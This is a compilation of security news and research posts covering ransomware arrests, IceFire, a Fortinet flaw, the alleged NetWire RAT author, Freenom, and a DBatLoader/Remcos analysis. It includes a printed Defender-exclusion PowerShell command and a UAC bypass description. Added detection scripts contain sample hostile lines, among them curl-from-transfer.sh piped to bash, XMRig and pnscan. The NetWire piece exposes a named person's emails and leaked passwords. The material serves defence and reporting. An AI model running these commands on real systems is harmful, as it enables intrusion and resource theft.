The Good, the Bad and the Ugly in Cybersecurity – Week 10

The Good

Prolific ransomware gang, DoppelPaymer (aka Grief), took a major hit this week as a number of their core members were arrested in Germany and Ukraine. In a joint operation conducted by Europol, the FBI, and the Dutch police force, two individuals have been taken into custody following multiple raids in both countries. IT experts and investigators are currently examining all seized electronic devices for forensic evidence and crypto tracing. In their statement, Europol stated that data from the resulting analysis is expected to trigger investigations in related cases.

Russian-linked DoppelPaymer has cost enterprises millions over the years. Operating as a Ransomware-as-a-Service (RaaS), the gang often leverages Emotet and Dridex malware variants to launch high-profile, double extortion attacks focused on the healthcare, government, and education sectors. In 2020, the gang crashed the operational systems of a hospital in Düsseldorf, causing critical delays in emergency treatments. The resulting death of one patient is often referred to as the first possible case of an indirect casualty due to a cyberattack. Past victims of the gang include SpaceX, NASA, Kia Motors, Compal, and Foxconn.

The DoppelPaymer sting operation is ongoing and authorities have issued arrest warrants for three more principal members who are still at large. Three suspects, Igor Olegovich Turashev, Irina Zemlyanikina, and Igor Garshin, are all wanted on charges including extortion, computer sabotage, spying, data encryption, and the administration of DoppelPaymer’s IT infrastructure, internal chats, and leak sites.

This operation is the latest in a global effort to crack down on prominent ransomware syndicates. While collaboration between international authorities makes impactful progress on dismantling cybercriminal networks, police urge organizations to continue reporting attacks immediately and implementing proactive measures against ever-rising ransomware attacks.

The Bad

IceFire ransomware operators have launched a new dedicated encryptor to actively target Linux systems. Reported this week by SentinelLabs, the ransomware gang recently targeted several media and entertainment enterprises across the world, encrypting their systems with the novel malware variant.

In this recent string of breaches, IceFire was observed exploiting a deserialization vulnerability tracked as CVE-2022-47986 (CVSS score 9.8) within IBM’s Aspera Faspex product (4.42 Patch Level 1) to deploy ransomware payloads. IceFire operators leveraged this flaw to execute arbitrary code on the infected system by sending a specially crafted obsolete API call. Upon execution, the IceFire ransomware works by encrypting files and adding the iFire extension to the name before deleting itself and removing the binary to wipe its own tracks.

Linux version of IceFire ransom note

SentinelLabs researchers explained that, in comparison to Windows, attackers have more difficulty deploying ransomware within Linux servers, especially at scale. To overcome this, attackers are increasingly turning to exploiting vulnerabilities within applications. At the time of this publication, Shodan shows 158 Aspera Faspex servers exposed online, mostly in the United States and China.

The shift from targeting Windows to Linux systems is a strategic one that is gaining traction across the greater cyberthreat landscape. Ransomware groups such as Cl0p, Hive, LockBit, HelloKitty, BlackMatter, RansomEXX, and AvosLocker have also made this move, seemingly to match global enterprises who have transitioned to Linux-powered virtual machines in the past few years. Researchers at SentinelLabs note that the recent evolution for IceFire is a clear indication that this trend will continue to grow in popularity throughout the rest of 2023.

The Ugly

A security advisory published by Fortinet this week disclosed a critical buffer underflow vulnerability impacting the company’s FortiOS and FortiProxy products. Tracked as CVE-2023-25610 (CVSS score 9.3), the vulnerability allows an unauthenticated attacker to execute arbitrary code or launch a denial of service (DoS) attack on the GUI of vulnerable devices.

This type of vulnerability is the result of programs trying to read more data from a memory buffer than what is available. In this scenario, the program ends up accessing adjacent memory locations, which may lead to crashes and data loss. Buffer underflow vulnerabilities are most often leveraged by attackers for remote code execution (RCE) and DoS attacks. Fortinet strongly urges its users to deploy the security updates immediately. As a temporary workaround, users may also choose to disable access to the HTTP/HTTPS administrative interface or limit the IP addresses that have access to the interface.

Though Fortinet notes that it is not aware of any instance of exploitation of CVE-2023-25610 in the wild, this flaw closely follows on the heels of two other critical RCE flaws that impacted the company’s FortiNAC and FortiWeb products. Just four days after fixes were published for the pair of RCE flaws, a working proof-of-concept was made public resulting in immediate exploitation in the wild. Security teams are reminded that opportunistic attackers continuously sweep for vulnerabilities that allow them to gain initial access with as little work as possible. Critical-level vulnerabilities, particularly those that do not require authentication, are highly attractive to attackers and should be patched as a priority.

Who’s Behind the NetWire Remote Access Trojan?

A Croatian national has been arrested for allegedly operating NetWire, a Remote Access Trojan (RAT) marketed on cybercrime forums since 2012 as a stealthy way to spy on infected systems and siphon passwords. The arrest coincided with a seizure of the NetWire sales website by the U.S. Federal Bureau of Investigation (FBI). While the defendant in this case hasn’t yet been named publicly, the NetWire website has been leaking information about the likely true identity and location of its owner for the past 11 years.

Typically installed by booby-trapped Microsoft Office documents and distributed via email, NetWire is a multi-platform threat that is capable of targeting not only Microsoft Windows machines but also Android, Linux and Mac systems.

NetWire’s reliability and relatively low cost ($80-$140 depending on features) has made it an extremely popular RAT on the cybercrime forums for years, and NetWire infections consistently rank among the top 10 most active RATs in use.

NetWire has been sold openly on the same website since 2012: worldwiredlabs[.]com. That website now features a seizure notice from the U.S. Department of Justice, which says the domain was taken as part of “a coordinated law enforcement action taken against the NetWire Remote Access Trojan.”

“As part of this week’s law enforcement action, authorities in Croatia on Tuesday arrested a Croatian national who allegedly was the administrator of the website,” reads a statement by the U.S. Department of Justice today. “This defendant will be prosecuted by Croatian authorities. Additionally, law enforcement in Switzerland on Tuesday seized the computer server hosting the NetWire RAT infrastructure.”

Neither the DOJ’s statement nor a press release on the operation published by Croatian authorities mentioned the name of the accused. But it’s fairly remarkable that it has taken so long for authorities in the United States and elsewhere to move against NetWire and its alleged proprietor, given that the RAT’s author apparently did very little to hide his real-life identity.

The WorldWiredLabs website first came online in February 2012 using a dedicated host with no other domains. The site’s true WHOIS registration records have always been hidden by privacy protection services, but there are plenty of clues in historical Domain Name System (DNS) records for WorldWiredLabs that point in the same direction.

In October 2012, the WorldWiredLabs domain moved to another dedicated server at the Internet address 198.91.90.7, which was home to just one other domain: printschoolmedia[.]org, also registered in 2012.

According to DomainTools.com, printschoolmedia[.]org was registered to a Mario Zanko in Zapresic, Croatia, and to the email address zankomario@gmail.com. DomainTools further shows this email address was used to register one other domain in 2012: wwlabshosting[.]com, also registered to Mario Zanko from Croatia.

A review of DNS records for both printschoolmedia[.]org and wwlabshosting[.]com shows that while these domains were online they both used the DNS name server ns1.worldwiredlabs[.]com. No other domains have been recorded using that same name server.

The WorldWiredLabs website, in 2013. Source: Archive.org.

DNS records for worldwiredlabs[.]com also show the site forwarded incoming email to the address tommaloney@ruggedinbox.com. Constella Intelligence, a service that indexes information exposed by public database leaks, shows this email address was used to register an account at the clothing retailer romwe.com, using the password “123456xx.”

Running a reverse search on this password in Constella Intelligence shows there are more than 450 email addresses known to have used this credential, and two of those are zankomario@gmail.com and zankomario@yahoo.com.

A search on zankomario@gmail.com in Skype returns three results, including the account name “Netwire” and the username “Dugidox,” and another for a Mario Zanko (username zanko.mario).

Dugidox corresponds to the hacker handle most frequently associated with NetWire sales and support discussion threads on multiple cybercrime forums over the years.

Constella ties dugidox@gmail.com to a number of website registrations, including the Dugidox handle on BlackHatWorld and HackForums, and to IP addresses in Croatia for both. Constella also shows the email address zankomario@gmail.com used the password “dugidox2407.”

In 2010, someone using the email address dugidox@gmail.com registered the domain dugidox[.]com. The WHOIS registration records for that domain list a “Senela Eanko” as the registrant, but the address used was the same street address in Zapresic that appears in the WHOIS records for printschoolmedia[.]org, which is registered in Mr. Zanko’s name.

Prior to the demise of Google+, the email address dugidox@gmail.com mapped to an account with the nickname “Netwire wwl.” The dugidox email also was tied to a Facebook account (mario.zanko3), which featured check-ins and photos from various places in Croatia.

That Facebook profile is no longer active, but back in January 2017, the administrator of WorldWiredLabs posted that he was considering adding certain Android mobile functionality to his service. Three days after that, the mario.zanko3 profile posted a photo saying he was selected for an Android instruction course — with his dugidox email in the photo, naturally.

Incorporation records from the U.K.’s Companies House show that in 2017 Mr. Zanko became an officer in a company called Godbex Solutions LTD. A YouTube video invoking this corporate name describes Godbex as a “next generation platform” for exchanging gold and cryptocurrencies.

The U.K. Companies House records show Godbex was dissolved in 2020. It also says Mr. Zanko was born in July 1983, and lists his occupation as “electrical engineer.”

Mr. Zanko did not respond to multiple requests for comment.

Five Ways to #EmbraceEquity in the Workplace

Today is International Women’s Day and the theme for this year is #EmbraceEquity. Even with our progress in gender equality, women are still grossly underrepresented in the workplace – only 1 in 4 C-suite executives is a woman, and only 1 in 20 is a woman of color.

In the tech industry, the story is similar. Roughly 25% of all tech workers are women and the imbalance dips to 16% female representation in software engineering. As we work to close the gap, women’s representation in tech new hires has increased slightly to 31%.

The recent spate of tech layoffs is not helping progress. Women account for 46% of those let go, a statistic that further shrinks an already underrepresented group. Transformative change will take mass action from all and call for a seismic shift in the way we #EmbraceEquity in the workplace.

I am encouraged that many leaders are coming forward to find a path where they foster diverse workplaces without compromising on the quality of talent or impact. They realize that a more diverse, equitable and inclusive company is a more successful one. Women bring amazing talents, skill sets, experiences, and perspectives that are critical to success.

Here are five ways to #EmbraceEquity in the workplace and close the gender gap to ensure women have the same access to successful, fulfilling careers in tech and have game-changing impact on their workplaces and communities.

1. Shine the Spotlight | Diversify Your Talent Pipeline

More often than not, leaders today want to take action, but first we need to sincerely address the common refrain of “we just don’t have diverse talent in our pipeline!”

This needs attention at all levels. A strong university recruiting and internship program can have a big impact in diversifying your pipeline, so invest in that. These can and will be your leaders for tomorrow and will dramatically influence your talent mix, so prioritize these programs in your operating plans. Growing your own talent will always be more effective, both in impact and on your operating margin, than poaching from your competition.

Next, closing the gender gap starts with fair and equitable hiring practices and tracking progress against them. Having qualified female representation both in the candidate slate and on the interview panel is paramount, with more than one qualified woman candidate advancing to the final interview round. It’s also critical to have pipeline reporting, where applicable by law, to know just how many women are being considered – you can’t grow what you don’t know!

Most importantly, creating a culture where all voices are heard is central to helping people of all genders, representations and backgrounds succeed. Succession planning, internal promotions, and a commitment to career pathing are important pathways to growing and retaining top talent on your bench. If you don’t create opportunities for your high-performing women, one thing is for certain – your competitors will.

2. Amplify the Power of Community

The power of community invigorates and blazes trails for many across your organization to succeed. Create several platforms for women and their allies to connect with each other to share their journeys and stories and learn from mentorship opportunities. Employee-led women’s networks can foster an inclusive workplace and are critical catalysts for positive change, giving people a great way to network, learn, and celebrate what makes us different and unique. Leadership advocacy is crucial to success within a women’s network and for ensuring that the issues that matter most to gender equity are heard at the highest levels.

Look for established experts in the space to connect and collaborate with such as Women in Cybersecurity, Girls Who Code, and AnitaB.org. Sponsoring women of all levels to get engaged with non-profit advocacy groups is a great way to encourage networking while casting a wide net for new female talent.

3. Drive Accountability with Insights & Data

‘Diversity and Inclusion’ is not an initiative; it’s a way of operating. Just as we measure operational efficiency, sales success, and profit margin, if you want to truly #EmbraceEquity, you have to set reasonable goals, create meaningful KPIs, and consistently monitor progress. Statistics like overall gender percentages, percentage of female promotions, diversity mix of both internal and external talent pipelines and percentage of women in leadership positions are key metrics to measure improvement.

Just as important as measuring progress is halting any actions that could stop it. Swift action must be taken on any discriminatory behavior in the workplace.

4. Foster Equity Through Learning

A learning culture is a more equitable one. To fully #EmbraceEquity, there must be a defined DEI learning journey for all employees at all levels. It starts with leadership training and coaching and includes other key concepts like unconscious bias, microaggressions, sexual harassment, and bystander intervention.

Taking the time to listen and learn from the experiences of others might be the most insightful learning of all. Creating authentic mentoring relationships for women can increase confidence and accelerate development. Best part of the equation? Both sides of the relationship are better for the experience!

5. Make Space to Hear All Voices

When women feel they are being heard and that their voice matters, they use it more. Helping others find their voice can be as simple as asking for an opinion in a meeting or inviting someone to collaborate on a project. Seeking the power of female voices will not only improve your process, it will improve your product.

Inviting women of all levels and functions to make an impact is a win-win on all sides of the equation. You are instilling confidence, unlocking productivity, and building your leadership bench. Making a commitment to #EmbraceEquity is not just something we are doing to improve the workplace – it’s a call to action to improve the world!

About the Author

Divya Ghatak is a top tech talent executive with over 20 years of global experience. As the Chief People Officer at SentinelOne, Divya is a transformative leader who drives a people-first experience and fosters a values-driven culture. Her true passion is equity in the workplace and continuing to close the gender gap in tech for the next generation, including her lovely daughter, Ananya.

Sued by Meta, Freenom Halts Domain Registrations

The domain name registrar Freenom, whose free domain names have long been a draw for spammers and phishers, has stopped allowing new domain name registrations. The move comes just days after the Dutch registrar was sued by Meta, which alleges the company ignores abuse complaints about phishing websites while monetizing traffic to those abusive domains.

Freenom’s website features a message saying it is not currently allowing new registrations.

Freenom is the domain name registry service provider for five so-called “country code top level domains” (ccTLDs), including .cf for the Central African Republic; .ga for Gabon; .gq for Equatorial Guinea; .ml for Mali; and .tk for Tokelau.

Freenom has always waived the registration fees for domains in these country-code domains, presumably as a way to encourage users to pay for related services, such as registering a .com or .net domain, for which Freenom does charge a fee.

On March 3, 2023, social media giant Meta sued Freenom in a Northern California court, alleging cybersquatting violations and trademark infringement. The lawsuit also seeks information about the identities of 20 different “John Does” — Freenom customers that Meta says have been particularly active in phishing attacks against Facebook, Instagram, and WhatsApp users.

The lawsuit points to a 2021 study (PDF) on the abuse of domains conducted by Interisle Consulting Group, which discovered that those ccTLDs operated by Freenom made up five of the Top Ten TLDs most abused by phishers.

“The five ccTLDs to which Freenom provides its services are the TLDs of choice for cybercriminals because Freenom provides free domain name registration services and shields its customers’ identity, even after being presented with evidence that the domain names are being used for illegal purposes,” the complaint charges. “Even after receiving notices of infringement or phishing by its customers, Freenom continues to license new infringing domain names to those same customers.”

Meta further alleges that “Freenom has repeatedly failed to take appropriate steps to investigate and respond appropriately to reports of abuse,” and that it monetizes the traffic from infringing domains by reselling them and by adding “parking pages” that redirect visitors to other commercial websites, websites with pornographic content, and websites used for malicious activity like phishing.

Freenom has not yet responded to requests for comment. But attempts to register a domain through the company’s website as of publication time generated an error message that reads:

“Because of technical issues the Freenom application for new registrations is temporarily out-of-order. Please accept our apologies for the inconvenience. We are working on a solution and hope to resume operations shortly. Thank you for your understanding.”

Image: Interisle Consulting Group, Phishing Landscape 2021, Sept. 2021.

Although Freenom is based in The Netherlands, some of its other sister companies named as defendants in the lawsuit are incorporated in the United States.

Meta initially filed this lawsuit in December 2022, but it asked the court to seal the case, which would have restricted public access to court documents in the dispute. That request was denied, and Meta amended and re-filed the lawsuit last week.

According to Meta, this isn’t just a case of another domain name registrar ignoring abuse complaints because it’s bad for business. The lawsuit alleges that the owners of Freenom “are part of a web of companies created to facilitate cybersquatting, all for the benefit of Freenom.”

“On information and belief, one or more of the ccTLD Service Providers, ID Shield, Yoursafe, Freedom Registry, Fintag, Cervesia, VTL, Joost Zuurbier Management Services B.V., and Doe Defendants were created to hide assets, ensure unlawful activity including cybersquatting and phishing goes undetected, and to further the goals of Freenom,” Meta charged.

It remains unclear why Freenom has stopped allowing domain registration, but it could be that the company was recently the subject of some kind of disciplinary action by the Internet Corporation for Assigned Names and Numbers (ICANN), the nonprofit entity which oversees the domain registrars.

In June 2015, ICANN suspended Freenom’s ability to create new domain names or initiate inbound transfers of domain names for 90 days. According to Meta, the suspension was premised on ICANN’s determination that Freenom “has engaged in a pattern and practice of trafficking in or use of domain names identical or confusingly similar to a trademark or service mark of a third party in which the Registered Name Holder has no rights or legitimate interest.”

ICANN has not yet responded to requests for comment.

A copy of the amended complaint against Freenom, et al., is available here (PDF).

DBatLoader and Remcos RAT Sweep Eastern Europe

SentinelOne has been observing phishing campaigns that distribute the Remcos RAT using the DBatLoader malware loader to target predominantly Eastern European institutions and businesses. In this blog post, we summarize our observations on these campaigns to equip defenders with the information they need to protect against this threat.

DBatLoader is characterized by the abuse of public Cloud infrastructure to host its malware staging component. The feature-rich RAT Remcos is actively used by threat actors with cybercriminal and espionage motivations. Threat actors typically distribute the RAT through phishing emails and stage it on systems using a variety of forms and methods.

Examples include the use of the TrickGate loader stored in archive files, malicious ISO images, and URLs to VBScript scripts embedded in pictures. Further, the Ukrainian CERT has recently issued reports on Remcos RAT phishing campaigns targeting Ukrainian state institutions for espionage purposes using password-protected archives as email attachments.

This report complements the available information about recent phishing campaigns that distribute Remcos by highlighting the way in which DBatLoader stages the RAT on infected systems.

DBatLoader and Remcos Phishing Emails

The phishing emails distributing DBatLoader and Remcos have attachments in the form of tar.lz archives that typically masquerade as financial documents, such as invoices or tender documentation. To make the emails look credible, we observed the threat actors using a variety of techniques.

From the recipient’s perspective, the phishing emails originate from institutions or business organizations related to the target such that sending an invoice would be realistic. The emails are typically sent to the sales departments of the targets or their main contact email addresses as disclosed online.

We observed emails sent from what seems to be compromised private email accounts and accounts from public email services that are also used by the targets and the legitimate institutions or organizations which are supposedly sending the email.

Many of the phishing emails we observed have been sent from email accounts with top-level domains of the same country as where the target is based. These emails typically do not contain any text accompanying the malicious attachment or contain text written in the language of the target’s country. In the cases where the threat actors are not masquerading the phishing emails as originating from an institution or business organization local to the target, the emails contain text written in English.

Example phishing email

DBatLoader Staging Remcos RAT

The tar.lz archives attached to phishing emails contain DBatLoader executables. These pack Remcos and usually masquerade as Microsoft Office, LibreOffice, or PDF documents using double extensions and/or application icons.

When a user decompresses the attachment and runs the executable within, DBatLoader downloads and executes an obfuscated second-stage payload from a public Cloud location. We observed download links to Microsoft OneDrive and Google Drive sites (under the drive.google.com and onedrive.live.com domains) with varying lifetime spans, the longest of which was more than one month.

The Cloud file storage locations that were active while we investigated contained only the second-stage DBatLoader payload data and were registered to individuals. We have no knowledge at this point whether the threat actors have been using self-registered and/or compromised Microsoft OneDrive and Google Drive credentials to host DBatLoader payload.

The malware then creates and executes an initial Windows batch script in the %Public%\Libraries directory. This script abuses a known method for bypassing Windows User Account Control that involves the creation of mock trusted directories, such as %SystemRoot%\System32, by using trailing spaces. This enables the attackers to conduct elevated activities without alerting users.

An initial batch script

The script creates the mock %SystemRoot%\System32 trusted directory by issuing requests directly to the file system – note the prepended \\?\ to the directory names. It then copies into this directory a KDECO.bat batch script, the legitimate easinvoker.exe (Exchange ActiveSync Invoker) executable, and a malicious netutils.dll DLL file, which DBatLoader had previously dropped in the %Public%\Libraries directory. The script then executes the easinvoker.exe copy and deletes the mock directory.

easinvoker.exe is susceptible to DLL hijacking through netutils.dll, enabling the execution of the malicious netutils.dll in its context. easinvoker.exe is an auto-elevated executable, meaning that Windows automatically elevates this process without issuing a UAC prompt if it is located in a trusted directory – the mock %SystemRoot%\System32 directory ensures this criterion is fulfilled.

easinvoker.exe loads the malicious netutils.dll, which executes the KDECO.bat script.

netutils.dll executes KDECO.bat

As an anti-detection measure, KDECO.bat adds the C:\Users directory to the Microsoft Defender exclusion list to exclude the directory from scanning.

powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"

DBatLoader establishes persistence across system reboots by copying itself into the %Public%\Libraries directory and creating an autorun registry key under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. This key points to an Internet Shortcut file that executes the DBatLoader executable in %Public%\Libraries, which in turn executes Remcos through process injection.

Example Internet Shortcut file

We observed a wide variety of Remcos configurations, most of which configured keylogging and screenshot theft capabilities as well as duckdns dynamic DNS domains for C2 purposes.

Example Remcos configuration

Recommendations for Users and Administrators

To reduce risk, users should remain alert against phishing attacks and avoid opening attachments from unknown sources. It is important to note that DBatLoader and Remcos are often disguised as financial documents, emphasizing caution when handling such files.

For administrators:

  • Stay vigilant against malicious network requests to public Cloud instances. The use of public Cloud infrastructure for hosting malware is an attempt to make network traffic for malware delivery look legitimate, making detection harder for defenders. This tactic is popular amongst cyber criminals and espionage threat actors, a recent example being the WIP26 espionage activity reported by SentinelLabs and QGroup GmbH.
  • Monitor for suspicious file creation activities in the %Public%\Libraries directory and process execution activities that involve filesystem paths with trailing spaces, especially a "Windows " directory name followed by a trailing space. The latter is a reliable indicator of malware attempting to bypass Windows UAC by abusing mock trusted directories, such as %SystemRoot%\System32.
  • Consider configuring Windows UAC to Always notify, which will always alert users when a program attempts to make changes to the computer.
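The following is an added example, not SentinelOne's code, that turns the staging chain described above and the two monitoring recommendations into detection heuristics: it flags path components with trailing spaces (the mock trusted directory, with or without the \\?\ prefix), file creation in %Public%\Libraries, Defender exclusions added via Add-MpPreference, and Run-key persistence pointing at an Internet Shortcut. The pipe-delimited key=value event format, the sample events, the user name and the .url file name are all constructed assumptions.

```python
r"""Heuristic detector for the DBatLoader/Remcos staging chain: mock trusted directories with
trailing spaces, staging in %Public%\Libraries, Defender exclusions and Run-key persistence.
The pipe-delimited "Key=Value|Key=Value" event format is an assumption, not real telemetry."""
from typing import Dict, List

LONG_PATH_PREFIX = "\\\\?\\"                           # the \\?\ prefix used to create the mock directory
PUBLIC_LIBRARIES = "c:\\users\\public\\libraries\\"   # default expansion of %Public%\Libraries
RUN_KEY_SUFFIX = "\\software\\microsoft\\windows\\currentversion\\run\\"


def strip_long_path_prefix(path: str) -> str:
    r"""Drop the \\?\ prefix so 'C:\Windows \System32' is seen as the same path either way."""
    return path[len(LONG_PATH_PREFIX):] if path.startswith(LONG_PATH_PREFIX) else path


def has_trailing_space_component(path: str, include_leaf: bool = True) -> bool:
    r"""True if any path component ends in whitespace, e.g. 'C:\Windows \System32\easinvoker.exe'.
    For command lines the leaf is skipped, because logged command lines often end in a stray space."""
    components = strip_long_path_prefix(path).split("\\")
    if not include_leaf:
        components = components[:-1]
    return any(c != c.rstrip() and bool(c.strip()) for c in components)


def is_under_public_libraries(path: str) -> bool:
    return strip_long_path_prefix(path).lower().startswith(PUBLIC_LIBRARIES)


def parse_event(line: str) -> Dict[str, str]:
    """Parse one 'Key=Value|Key=Value' line; values may contain spaces, quotes and backslashes."""
    event: Dict[str, str] = {}
    for token in line.split("|"):
        key, sep, value = token.partition("=")
        if sep:
            event[key.strip()] = value
    return event


def detect(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event triggers (empty list if nothing matched)."""
    hits: List[str] = []
    etype = event.get("EventType", "")
    cmd = event.get("CommandLine", "")
    # Rule 1: any trailing-space directory component in an image, target file or command line.
    if any(has_trailing_space_component(event[k]) for k in ("Image", "TargetFilename") if k in event) \
            or has_trailing_space_component(cmd, include_leaf=False):
        hits.append("mock_trusted_directory")
    # Rule 2: files dropped into %Public%\Libraries (KDECO.bat, netutils.dll, the loader copy).
    if etype == "FileCreate" and is_under_public_libraries(event.get("TargetFilename", "")):
        hits.append("public_libraries_staging")
    # Rule 3: a Defender exclusion being added from the command line.
    if "add-mppreference" in cmd.lower() and "-exclusionpath" in cmd.lower():
        hits.append("defender_exclusion_added")
    # Rule 4: a Run value that points to a .url file or into %Public%\Libraries.
    if etype == "RegistryValueSet" and RUN_KEY_SUFFIX in event.get("TargetObject", "").lower():
        data = event.get("Details", "").lower()
        if data.endswith(".url") or "\\public\\libraries\\" in data:
            hits.append("run_key_persistence")
    return hits


def scan(lines: List[str]) -> List[List[str]]:
    """Run every rule over every event line and return the hits per line, in order."""
    return [detect(parse_event(line)) for line in lines]


# Constructed sample events modelled on the chain in the text; the user name "alice" and the
# shortcut name "stager.url" are placeholders, not observed indicators.
SAMPLE_EVENTS = [
    r"EventType=FileCreate|Image=C:\Users\alice\Downloads\invoice.pdf.exe"
    r"|TargetFilename=C:\Users\Public\Libraries\netutils.dll",
    r'EventType=ProcessCreate|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd /c mkdir "\\?\C:\Windows \System32"',
    r"EventType=ProcessCreate|Image=C:\Windows \System32\easinvoker.exe|ParentImage=C:\Windows\System32\cmd.exe",
    r"EventType=ProcessCreate|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|CommandLine=powershell -WindowStyle Hidden -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users'",
    r"EventType=RegistryValueSet|TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Run\stager"
    r"|Details=C:\Users\Public\Libraries\stager.url",
    r"EventType=ProcessCreate|Image=C:\Windows\System32\notepad.exe|CommandLine=notepad.exe C:\Users\alice\notes.txt",
]

if __name__ == "__main__":
    for line, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(hits or ["benign"], "<-", line[:72])
```

The last sample event is benign and produces no hits, which is the false-positive check a rule like this needs before it goes into production.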

Conclusion

The Remcos RAT, which is distributed through phishing campaigns utilizing the DBatLoader malware loader, poses a significant threat to Eastern European organizations and enterprises. Remcos is known for its use in cybercriminal and espionage campaigns. Threat actors have used various methods, such as the TrickGate loader, malicious ISO images, and URLs embedded in pictures, to plant the RAT on systems. DBatLoader leverages public Cloud infrastructure to host its malware staging component. To protect against these attacks, administrators must remain alert to phishing attempts, educate users to avoid opening attachments from unknown senders, and deploy advanced security measures such as XDR. Implementing XDR can provide comprehensive visibility across endpoints, cloud workloads, and network infrastructure, allowing organizations to detect and respond to threats quickly and effectively. By adopting these measures, institutions and businesses can lower their risk of falling victim to these attacks and safeguard their sensitive data.

The Good, the Bad and the Ugly in Cybersecurity – Week 9

The Good

In a first for the U.S., a coordinated, national cybersecurity strategy was unveiled this week as the government continues its campaign to get on top of a cybersecurity problem that has spiraled out of control in recent years.

The National Cybersecurity Strategy is an ambitious, five-pronged approach that seeks to defend critical infrastructure, disrupt threat actors, promote data privacy and security, invest in cyber resilience, and forge international partnerships to fight cyber threats.

The strategy comes as the latest response to the attacks on schools, healthcare, energy suppliers and food production outlets that have plagued the nation in recent years. Recognizing that nation-state espionage and supply chain attacks are also complex problems that need both investment and coordination between diverse entities, the government’s National Cybersecurity Strategy has itself been developed through consultation with both public and private sector companies and experts.

SentinelOne’s Juan Andres Guerrero-Saade, Senior Director of the company’s threat intelligence and research arm SentinelLabs, said that leaving security investments entirely up to the market had proven ineffective, and that the government’s plan was both timely and necessary. The strategy will help to reshape market dynamics to incentivize and reward security investment, he said.

Although the implementation details of the strategy remain to be seen, SentinelOne recognizes the importance of the approach and is committed to supporting it in the fight to secure and protect the digital landscape for all.

The Bad

Cryptojacking, it seems, is back in fashion. Cryptomining campaigns appeared to have waned after in-browser cryptojacking became more or less tapped out due to improved browser security, but campaigns to infect home, enterprise and now cloud hosts with stealthy resource-stealing malware have quietly been burrowing away in the dark.

This week, a new cryptojacking campaign targeting Redis database servers was brought to light. The campaign makes novel use of the popular file transfer service transfer.sh, a command line utility for sharing files over the internet. Many cloud-focused malware campaigns use shell scripts, and services like transfer.sh and pastebin are ideal for hosting and retrieving malicious payloads.

In this case, threat actors used the command line file transfer service to host scripts that dropped the XMRig cryptocurrency miner, terminated any competing miners, and installed the pnscan network scanner to discover other vulnerable Redis servers and spread the infection.
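The stages described above (a script fetched from a file-sharing service and piped to a shell, competing miners killed, an XMRig process started, a pnscan sweep for more Redis hosts) leave distinctive traces in process-execution telemetry. The following detector is an added example written for this post, not code from the campaign or from any SentinelOne product: it scans constructed log lines for each stage and then reports only hosts where more than one stage appears, since a single `curl` to transfer.sh on its own is weak evidence. The log format (timestamp, host, uid, command line), the pool hostname and the file paths are assumptions made for the example.

```python
"""Flag process-execution log lines matching the Redis cryptojacking pattern.

Added example, not from the original post. The log line format below is an
assumption for this example; adapt parse_line() to your own EDR or auditd
schema. Hosting services (transfer.sh, pastebin) and tool names (XMRig,
pnscan) come from the post; the remaining patterns are illustrative.
"""
import re
from dataclasses import dataclass

# Stage patterns, checked in order; the first match wins so that a
# "pkill -f xmrig" line is reported as a competitor kill, not as the miner.
STAGES = [
    ("stager_download", re.compile(
        r"\b(curl|wget)\b[^|;]*\b(transfer\.sh|pastebin\.com)\b[^|;]*\|\s*(ba)?sh\b", re.I)),
    ("competitor_kill", re.compile(
        r"\b(pkill|killall)\b[^;]*\b(xmrig|kinsing|kdevtmpfsi|minerd)\b", re.I)),
    ("miner", re.compile(r"\bxmrig\b|--donate-level\b|stratum\+tcp://", re.I)),
    ("scanner", re.compile(r"\bpnscan\b[^;]*\b6379\b", re.I)),
]

# Assumed log schema: "<timestamp> <host> uid=<n> cmd=<command line>"
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) uid=(?P<uid>\d+) cmd=(?P<cmd>.*)$")


@dataclass
class Finding:
    ts: str
    host: str
    uid: int
    stage: str
    cmd: str


def parse_line(line):
    """Return (ts, host, uid, cmd) or None for lines that do not fit the schema."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("ts"), m.group("host"), int(m.group("uid")), m.group("cmd")


def scan(lines):
    """Return one Finding per log line that matches a campaign stage."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, host, uid, cmd = parsed
        for stage, pattern in STAGES:
            if pattern.search(cmd):
                findings.append(Finding(ts, host, uid, stage, cmd))
                break
    return findings


def kill_chain_hosts(findings, min_stages=2):
    """Hosts on which at least `min_stages` distinct stages were observed."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f.host, set()).add(f.stage)
    return sorted(h for h, stages in by_host.items() if len(stages) >= min_stages)


# Constructed sample log: one infected Redis host and one benign download.
SAMPLE_LOG = [
    "2023-03-01T10:02:11Z redis-01 uid=999 cmd=curl -fsSL https://transfer.sh/get/EXAMPLE/x.sh | bash",
    "2023-03-01T10:02:14Z redis-01 uid=999 cmd=pkill -f kinsing",
    "2023-03-01T10:02:15Z redis-01 uid=999 cmd=/tmp/.x/xmrig -o stratum+tcp://pool.example:3333",
    "2023-03-01T10:03:40Z redis-01 uid=999 cmd=pnscan 10.0.0.0/24 6379",
    "2023-03-01T10:05:00Z web-02 uid=1000 cmd=curl -s https://transfer.sh/get/EXAMPLE/notes.txt -o notes.txt",
    "2023-03-01T10:05:01Z web-02 uid=1000 cmd=ls -la",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.host} [{f.stage}] {f.cmd}")
    print("hosts with multi-stage activity:", kill_chain_hosts(scan(SAMPLE_LOG)))
```

On the constructed log, all four stages are found on `redis-01` while the plain download on `web-02` produces no finding, so `kill_chain_hosts` returns only `redis-01`. The stage correlation is the part worth keeping: individual indicators such as a transfer.sh download or a `pkill` change from campaign to campaign, but the sequence of download, kill competitors, mine, and spread is what distinguishes this activity from ordinary administration.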


The campaign follows on the heels of renewed activity by 8220 Gang, who also propagate XMRig to surreptitiously mine cryptocurrency on compromised enterprise cloud workloads, and the recent discovery of Honkbox, a novel XMRig cryptomining malware that uses I2P tunnels to hide its traffic, which has been quietly targeting macOS endpoints for over three years.

